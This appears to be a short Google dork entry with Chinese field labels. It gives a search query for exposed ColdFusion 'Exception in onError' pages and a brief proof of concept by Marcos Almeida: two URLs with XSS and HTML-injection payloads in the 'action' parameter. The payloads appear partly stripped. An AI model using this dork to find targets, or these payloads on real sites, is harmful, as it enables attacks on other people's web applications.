inurl:"index.cfm?action=" intext:"Exception in onError"

  • 日期:2019-11-04
  • 类别:
  • 作者:Marcos Almeida
  • 语法:inurl:"index.cfm?action=" intext:"Exception in onError"
  • I have found a vulnerability in error page of coldfusion,

    Name of author: Marcos Almeida

    PoC

    XSS
    https://victimwebsite.com/?action=./ERROR?">&fw1pk=3

    HTMLI
    https://victimwebsite.com/?action=./ERROR?">ERROR&fw1pk=3